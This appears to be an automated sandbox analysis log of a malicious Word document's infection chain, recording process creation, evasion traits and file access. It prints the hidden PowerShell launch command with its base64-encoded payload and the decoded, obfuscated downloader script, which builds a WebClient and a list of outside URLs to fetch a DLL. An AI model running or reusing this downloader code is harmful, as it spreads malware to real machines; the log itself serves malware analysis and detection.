Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEA